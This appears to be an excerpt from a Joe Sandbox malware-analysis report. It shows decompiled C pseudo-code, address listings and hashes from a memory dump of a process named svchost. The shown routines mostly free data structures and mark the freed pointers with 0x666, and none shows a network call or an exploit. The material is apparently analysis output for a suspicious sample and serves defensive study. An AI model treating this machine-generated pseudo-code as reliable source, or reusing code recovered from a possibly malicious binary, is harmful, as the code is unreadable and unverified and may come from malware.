                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v100 + 4)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                      					_v40 =  *((intOrPtr*)(_v100 + 0x14));
                                                                                                                                                                                                                                                                      					_v36 = _v40;
                                                                                                                                                                                                                                                                      					if(_v36 == 0) {
                                                                                                                                                                                                                                                                      						_v108 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v108 = E04005100(_v36, 1);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v100 + 0x14)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t210 = _v100;
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_t210 + 0x18)) != 0) {
                                                                                                                                                                                                                                                                      					_v48 =  *((intOrPtr*)(_v100 + 0x18));
                                                                                                                                                                                                                                                                      					_t210 = _v48;
                                                                                                                                                                                                                                                                      					_v44 = _t210;
                                                                                                                                                                                                                                                                      					if(_v44 == 0) {
                                                                                                                                                                                                                                                                      						_v112 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t210 = E04005130(_v44, 1);
                                                                                                                                                                                                                                                                      						_v112 = _t210;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v100 + 0x18)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x20)) > 0) {
                                                                                                                                                                                                                                                                      					_t210 = _v100;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                                                                                      						while(_v8 <  *((intOrPtr*)(_v100 + 0x20))) {
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) != 0) {
                                                                                                                                                                                                                                                                      								_v56 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4));
                                                                                                                                                                                                                                                                      								_v52 = _v56;
                                                                                                                                                                                                                                                                      								if(_v52 == 0) {
                                                                                                                                                                                                                                                                      									_v116 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v116 = E04005160(_v52, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t210 = _v100;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                      							_v60 =  *((intOrPtr*)(_v100 + 0x1c));
                                                                                                                                                                                                                                                                      							_t210 = E04020CC0(_v60);
                                                                                                                                                                                                                                                                      							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_v100 + 0x1c)) = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x2c)) > 0) {
                                                                                                                                                                                                                                                                      					_t210 = _v100;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                      						_v12 = 0;
                                                                                                                                                                                                                                                                      						while(_v12 <  *((intOrPtr*)(_v100 + 0x2c))) {
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) != 0) {
                                                                                                                                                                                                                                                                      								_v68 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4));
                                                                                                                                                                                                                                                                      								_v64 = _v68;
                                                                                                                                                                                                                                                                      								if(_v64 == 0) {
                                                                                                                                                                                                                                                                      									_v120 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v120 = E04005190(_v64, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t210 = _v100;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                      							_v72 =  *((intOrPtr*)(_v100 + 0x28));
                                                                                                                                                                                                                                                                      							_t210 = E04020CC0(_v72);
                                                                                                                                                                                                                                                                      							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_v100 + 0x28)) = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x38)) > 0) {
                                                                                                                                                                                                                                                                      					_t210 = _v100;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                      						_v16 = 0;
                                                                                                                                                                                                                                                                      						while(_v16 <  *((intOrPtr*)(_v100 + 0x38))) {
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) != 0) {
                                                                                                                                                                                                                                                                      								_v80 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4));
                                                                                                                                                                                                                                                                      								_v76 = _v80;
                                                                                                                                                                                                                                                                      								if(_v76 == 0) {
                                                                                                                                                                                                                                                                      									_v124 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v124 = E040051C0(_v76, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t210 = _v100;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                      							_v84 =  *((intOrPtr*)(_v100 + 0x34));
                                                                                                                                                                                                                                                                      							_t210 = E04020CC0(_v84);
                                                                                                                                                                                                                                                                      							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_v100 + 0x34)) = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x44)) > 0) {
                                                                                                                                                                                                                                                                      					_t210 = _v100;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                      						_v20 = 0;
                                                                                                                                                                                                                                                                      						while(_v20 <  *((intOrPtr*)(_v100 + 0x44))) {
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) != 0) {
                                                                                                                                                                                                                                                                      								_v92 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4));
                                                                                                                                                                                                                                                                      								_v88 = _v92;
                                                                                                                                                                                                                                                                      								if(_v88 == 0) {
                                                                                                                                                                                                                                                                      									_v128 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v128 = E040051F0(_v88, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t210 = _v100;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                                      							_v96 =  *((intOrPtr*)(_v100 + 0x40));
                                                                                                                                                                                                                                                                      							_t213 = E04020CC0(_v96);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_v100 + 0x40)) = 0x666;
                                                                                                                                                                                                                                                                      							return _t213;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t210;
                                                                                                                                                                                                                                                                      			}





































                                                                                                                                                                                                                                                                      0x04023c96
                                                                                                                                                                                                                                                                      0x04023ca0
                                                                                                                                                                                                                                                                      0x04023ca8
                                                                                                                                                                                                                                                                      0x04023cae
                                                                                                                                                                                                                                                                      0x04023cb5
                                                                                                                                                                                                                                                                      0x04023cc6
                                                                                                                                                                                                                                                                      0x04023cb7
                                                                                                                                                                                                                                                                      0x04023cc1
                                                                                                                                                                                                                                                                      0x04023cc1
                                                                                                                                                                                                                                                                      0x04023cd0
                                                                                                                                                                                                                                                                      0x04023cd0
                                                                                                                                                                                                                                                                      0x04023cde
                                                                                                                                                                                                                                                                      0x04023ce6
                                                                                                                                                                                                                                                                      0x04023ced
                                                                                                                                                                                                                                                                      0x04023cf2
                                                                                                                                                                                                                                                                      0x04023cf8
                                                                                                                                                                                                                                                                      0x04023cf8
                                                                                                                                                                                                                                                                      0x04023d06
                                                                                                                                                                                                                                                                      0x04023d0e
                                                                                                                                                                                                                                                                      0x04023d14
                                                                                                                                                                                                                                                                      0x04023d1b
                                                                                                                                                                                                                                                                      0x04023d2c
                                                                                                                                                                                                                                                                      0x04023d1d
                                                                                                                                                                                                                                                                      0x04023d27
                                                                                                                                                                                                                                                                      0x04023d27
                                                                                                                                                                                                                                                                      0x04023d36
                                                                                                                                                                                                                                                                      0x04023d36
                                                                                                                                                                                                                                                                      0x04023d3d
                                                                                                                                                                                                                                                                      0x04023d44
                                                                                                                                                                                                                                                                      0x04023d4c
                                                                                                                                                                                                                                                                      0x04023d4f
                                                                                                                                                                                                                                                                      0x04023d52
                                                                                                                                                                                                                                                                      0x04023d59
                                                                                                                                                                                                                                                                      0x04023d6a
                                                                                                                                                                                                                                                                      0x04023d5b
                                                                                                                                                                                                                                                                      0x04023d60
                                                                                                                                                                                                                                                                      0x04023d65
                                                                                                                                                                                                                                                                      0x04023d65
                                                                                                                                                                                                                                                                      0x04023d74
                                                                                                                                                                                                                                                                      0x04023d74
                                                                                                                                                                                                                                                                      0x04023d82
                                                                                                                                                                                                                                                                      0x04023d88
                                                                                                                                                                                                                                                                      0x04023d8f
                                                                                                                                                                                                                                                                      0x04023d95
                                                                                                                                                                                                                                                                      0x04023da7
                                                                                                                                                                                                                                                                      0x04023dbf
                                                                                                                                                                                                                                                                      0x04023dcd
                                                                                                                                                                                                                                                                      0x04023dd3
                                                                                                                                                                                                                                                                      0x04023dda
                                                                                                                                                                                                                                                                      0x04023deb
                                                                                                                                                                                                                                                                      0x04023ddc
                                                                                                                                                                                                                                                                      0x04023de6
                                                                                                                                                                                                                                                                      0x04023de6
                                                                                                                                                                                                                                                                      0x04023dfb
                                                                                                                                                                                                                                                                      0x04023dfb
                                                                                                                                                                                                                                                                      0x04023da4
                                                                                                                                                                                                                                                                      0x04023da4
                                                                                                                                                                                                                                                                      0x04023e04
                                                                                                                                                                                                                                                                      0x04023e0b
                                                                                                                                                                                                                                                                      0x04023e13
                                                                                                                                                                                                                                                                      0x04023e1a
                                                                                                                                                                                                                                                                      0x04023e1f
                                                                                                                                                                                                                                                                      0x04023e25
                                                                                                                                                                                                                                                                      0x04023e25
                                                                                                                                                                                                                                                                      0x04023e0b
                                                                                                                                                                                                                                                                      0x04023d8f
                                                                                                                                                                                                                                                                      0x04023e33
                                                                                                                                                                                                                                                                      0x04023e39
                                                                                                                                                                                                                                                                      0x04023e40
                                                                                                                                                                                                                                                                      0x04023e46
                                                                                                                                                                                                                                                                      0x04023e58
                                                                                                                                                                                                                                                                      0x04023e70
                                                                                                                                                                                                                                                                      0x04023e7e
                                                                                                                                                                                                                                                                      0x04023e84
                                                                                                                                                                                                                                                                      0x04023e8b
                                                                                                                                                                                                                                                                      0x04023e9c
                                                                                                                                                                                                                                                                      0x04023e8d
                                                                                                                                                                                                                                                                      0x04023e97
                                                                                                                                                                                                                                                                      0x04023e97
                                                                                                                                                                                                                                                                      0x04023eac
                                                                                                                                                                                                                                                                      0x04023eac
                                                                                                                                                                                                                                                                      0x04023e55
                                                                                                                                                                                                                                                                      0x04023e55
                                                                                                                                                                                                                                                                      0x04023eb5
                                                                                                                                                                                                                                                                      0x04023ebc
                                                                                                                                                                                                                                                                      0x04023ec4
                                                                                                                                                                                                                                                                      0x04023ecb
                                                                                                                                                                                                                                                                      0x04023ed0
                                                                                                                                                                                                                                                                      0x04023ed6
                                                                                                                                                                                                                                                                      0x04023ed6
                                                                                                                                                                                                                                                                      0x04023ebc
                                                                                                                                                                                                                                                                      0x04023e40
                                                                                                                                                                                                                                                                      0x04023ee4
                                                                                                                                                                                                                                                                      0x04023eea
                                                                                                                                                                                                                                                                      0x04023ef1
                                                                                                                                                                                                                                                                      0x04023ef7
                                                                                                                                                                                                                                                                      0x04023f09
                                                                                                                                                                                                                                                                      0x04023f21
                                                                                                                                                                                                                                                                      0x04023f2f
                                                                                                                                                                                                                                                                      0x04023f35
                                                                                                                                                                                                                                                                      0x04023f3c
                                                                                                                                                                                                                                                                      0x04023f4d
                                                                                                                                                                                                                                                                      0x04023f3e
                                                                                                                                                                                                                                                                      0x04023f48
                                                                                                                                                                                                                                                                      0x04023f48
                                                                                                                                                                                                                                                                      0x04023f5d
                                                                                                                                                                                                                                                                      0x04023f5d
                                                                                                                                                                                                                                                                      0x04023f06
                                                                                                                                                                                                                                                                      0x04023f06
                                                                                                                                                                                                                                                                      0x04023f66
                                                                                                                                                                                                                                                                      0x04023f6d
                                                                                                                                                                                                                                                                      0x04023f75
                                                                                                                                                                                                                                                                      0x04023f7c
                                                                                                                                                                                                                                                                      0x04023f81
                                                                                                                                                                                                                                                                      0x04023f87
                                                                                                                                                                                                                                                                      0x04023f87
                                                                                                                                                                                                                                                                      0x04023f6d
                                                                                                                                                                                                                                                                      0x04023ef1
                                                                                                                                                                                                                                                                      0x04023f95
                                                                                                                                                                                                                                                                      0x04023f9b
                                                                                                                                                                                                                                                                      0x04023fa2
                                                                                                                                                                                                                                                                      0x04023fa8
                                                                                                                                                                                                                                                                      0x04023fba
                                                                                                                                                                                                                                                                      0x04023fd2
                                                                                                                                                                                                                                                                      0x04023fe0
                                                                                                                                                                                                                                                                      0x04023fe6
                                                                                                                                                                                                                                                                      0x04023fed
                                                                                                                                                                                                                                                                      0x04023ffe
                                                                                                                                                                                                                                                                      0x04023fef
                                                                                                                                                                                                                                                                      0x04023ff9
                                                                                                                                                                                                                                                                      0x04023ff9
                                                                                                                                                                                                                                                                      0x0402400e
                                                                                                                                                                                                                                                                      0x0402400e
                                                                                                                                                                                                                                                                      0x04023fb7
                                                                                                                                                                                                                                                                      0x04023fb7
                                                                                                                                                                                                                                                                      0x04024017
                                                                                                                                                                                                                                                                      0x0402401e
                                                                                                                                                                                                                                                                      0x04024026
                                                                                                                                                                                                                                                                      0x0402402d
                                                                                                                                                                                                                                                                      0x04024038
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04024038
                                                                                                                                                                                                                                                                      0x0402401e
                                                                                                                                                                                                                                                                      0x04023fa2
                                                                                                                                                                                                                                                                      0x04024042

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: codecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                      • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                      • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                                                                                      			E04024820(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a12) {
                                                                                                                                                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr* _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _t114;
                                                                                                                                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                                                                                                                                      				void* _t121;
                                                                                                                                                                                                                                                                      				signed char _t124;
                                                                                                                                                                                                                                                                      				intOrPtr _t130;
                                                                                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                                                                                      				void* _t198;
                                                                                                                                                                                                                                                                      				void* _t199;
                                                                                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                                                                                      				void* _t201;
                                                                                                                                                                                                                                                                      				void* _t203;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t199 = __esi;
                                                                                                                                                                                                                                                                      				_t198 = __edi;
                                                                                                                                                                                                                                                                      				_t146 = __ebx;
                                                                                                                                                                                                                                                                      				_v64 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				L1:
                                                                                                                                                                                                                                                                      				while(_a4 >= 0) {
                                                                                                                                                                                                                                                                      					_v28 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x18));
                                                                                                                                                                                                                                                                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x14));
                                                                                                                                                                                                                                                                      					if(_v28 != 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                      						_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _a4 * 4));
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_v20 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                      							E040114D0( *_v64, _a4, 0, 1, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                      							_t114 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t201 = _t200 + 4;
                                                                                                                                                                                                                                                                      							_v36 = _t114;
                                                                                                                                                                                                                                                                      							if(_v36 == 0) {
                                                                                                                                                                                                                                                                      								_v68 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v68 = E0401F4E0(_v36);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v12 = _v68;
                                                                                                                                                                                                                                                                      							E0401FC90(_t146, _v12, _t198, _t199,  *((intOrPtr*)(_v28 + 0x1c)), E040070A0( *((intOrPtr*)(_v28 + 0x1c))));
                                                                                                                                                                                                                                                                      							_t119 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t203 = _t201 + 8;
                                                                                                                                                                                                                                                                      							_v40 = _t119;
                                                                                                                                                                                                                                                                      							if(_v40 == 0) {
                                                                                                                                                                                                                                                                      								_v72 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v72 = E0401F4E0(_v40);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v24 = _v72;
                                                                                                                                                                                                                                                                      							_t121 = E040070A0( *((intOrPtr*)(_v28 + 0x20)));
                                                                                                                                                                                                                                                                      							_t200 = _t203 + 4;
                                                                                                                                                                                                                                                                      							_t189 =  *((intOrPtr*)(_v28 + 0x20));
                                                                                                                                                                                                                                                                      							E0401FC90(_t146, _v24, _t198, _t199,  *((intOrPtr*)(_v28 + 0x20)), _t121);
                                                                                                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                                                                                                      								_t124 = E04015C60(_t146,  *_v64, _t189, _v12);
                                                                                                                                                                                                                                                                      								_t190 = _t124 & 0x000000ff;
                                                                                                                                                                                                                                                                      								if((_t124 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if((E04015C60(_t146,  *_v64, _t190, _v24) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      									E040114D0( *_v64, _a4, 0, 0, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                      									_v32 = E040246A0(_t146, _v64, _t198, _t199);
                                                                                                                                                                                                                                                                      									if(_v32 != 0) {
                                                                                                                                                                                                                                                                      										_t130 = E04020CE0(0x14);
                                                                                                                                                                                                                                                                      										_t200 = _t200 + 4;
                                                                                                                                                                                                                                                                      										_v44 = _t130;
                                                                                                                                                                                                                                                                      										if(_v44 == 0) {
                                                                                                                                                                                                                                                                      											_v76 = 0;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_v76 = E04006060(_v44);
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v8 = _v76;
                                                                                                                                                                                                                                                                      										 *_v8 = E040242C0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v8 + 4)) = E040243F0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v8 + 8)) = E04024180(_t146, _v64, _t198, _t199, _v24);
                                                                                                                                                                                                                                                                      										_t195 = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                      										if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      											_t79 = _v20 + 0xc; // 0xc7077400
                                                                                                                                                                                                                                                                      											 *((intOrPtr*)(_v8 + 0xc)) = E040240B0(_t146, _v64, _t195, _t198, _t199,  *_t79);
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v8 + 0x10)) = _v32;
                                                                                                                                                                                                                                                                      										_t189 = 0;
                                                                                                                                                                                                                                                                      										if(0 != 0) {
                                                                                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                                                                                      								if(_v12 != 0) {
                                                                                                                                                                                                                                                                      									_v52 = _v12;
                                                                                                                                                                                                                                                                      									_v48 = _v52;
                                                                                                                                                                                                                                                                      									if(_v48 == 0) {
                                                                                                                                                                                                                                                                      										_v80 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v80 = E04004EA0(_v48, 1);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v12 = 0x666;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(_v24 != 0) {
                                                                                                                                                                                                                                                                      									_v60 = _v24;
                                                                                                                                                                                                                                                                      									_v56 = _v60;
                                                                                                                                                                                                                                                                      									if(_v56 == 0) {
                                                                                                                                                                                                                                                                      										_v84 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v84 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v24 = 0x666;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(0 != 0) {
                                                                                                                                                                                                                                                                      									goto L1;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								goto L38;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L38;
                                                                                                                                                                                                                                                                      			}


































                                                                                                                                                                                                                                                                      0x04024820
                                                                                                                                                                                                                                                                      0x04024820
                                                                                                                                                                                                                                                                      0x04024820
                                                                                                                                                                                                                                                                      0x04024826
                                                                                                                                                                                                                                                                      0x04024829
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04024830
                                                                                                                                                                                                                                                                      0x04024844
                                                                                                                                                                                                                                                                      0x04024850
                                                                                                                                                                                                                                                                      0x04024857
                                                                                                                                                                                                                                                                      0x04024870
                                                                                                                                                                                                                                                                      0x0402487a
                                                                                                                                                                                                                                                                      0x04024893
                                                                                                                                                                                                                                                                      0x0402489a
                                                                                                                                                                                                                                                                      0x0402489f
                                                                                                                                                                                                                                                                      0x040248a2
                                                                                                                                                                                                                                                                      0x040248a9
                                                                                                                                                                                                                                                                      0x040248b8
                                                                                                                                                                                                                                                                      0x040248ab
                                                                                                                                                                                                                                                                      0x040248b3
                                                                                                                                                                                                                                                                      0x040248b3
                                                                                                                                                                                                                                                                      0x040248c2
                                                                                                                                                                                                                                                                      0x040248df
                                                                                                                                                                                                                                                                      0x040248e6
                                                                                                                                                                                                                                                                      0x040248eb
                                                                                                                                                                                                                                                                      0x040248ee
                                                                                                                                                                                                                                                                      0x040248f5
                                                                                                                                                                                                                                                                      0x04024904
                                                                                                                                                                                                                                                                      0x040248f7
                                                                                                                                                                                                                                                                      0x040248ff
                                                                                                                                                                                                                                                                      0x040248ff
                                                                                                                                                                                                                                                                      0x0402490e
                                                                                                                                                                                                                                                                      0x04024918
                                                                                                                                                                                                                                                                      0x0402491d
                                                                                                                                                                                                                                                                      0x04024924
                                                                                                                                                                                                                                                                      0x0402492b
                                                                                                                                                                                                                                                                      0x04024930
                                                                                                                                                                                                                                                                      0x04024939
                                                                                                                                                                                                                                                                      0x0402493e
                                                                                                                                                                                                                                                                      0x04024943
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0402495d
                                                                                                                                                                                                                                                                      0x04024976
                                                                                                                                                                                                                                                                      0x04024983
                                                                                                                                                                                                                                                                      0x0402498a
                                                                                                                                                                                                                                                                      0x04024993
                                                                                                                                                                                                                                                                      0x04024998
                                                                                                                                                                                                                                                                      0x0402499b
                                                                                                                                                                                                                                                                      0x040249a2
                                                                                                                                                                                                                                                                      0x040249b1
                                                                                                                                                                                                                                                                      0x040249a4
                                                                                                                                                                                                                                                                      0x040249ac
                                                                                                                                                                                                                                                                      0x040249ac
                                                                                                                                                                                                                                                                      0x040249bb
                                                                                                                                                                                                                                                                      0x040249cd
                                                                                                                                                                                                                                                                      0x040249de
                                                                                                                                                                                                                                                                      0x040249f0
                                                                                                                                                                                                                                                                      0x040249f3
                                                                                                                                                                                                                                                                      0x040249f9
                                                                                                                                                                                                                                                                      0x040249fe
                                                                                                                                                                                                                                                                      0x04024a0d
                                                                                                                                                                                                                                                                      0x04024a0d
                                                                                                                                                                                                                                                                      0x04024a16
                                                                                                                                                                                                                                                                      0x04024a19
                                                                                                                                                                                                                                                                      0x04024a1b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0402498c
                                                                                                                                                                                                                                                                      0x00000000
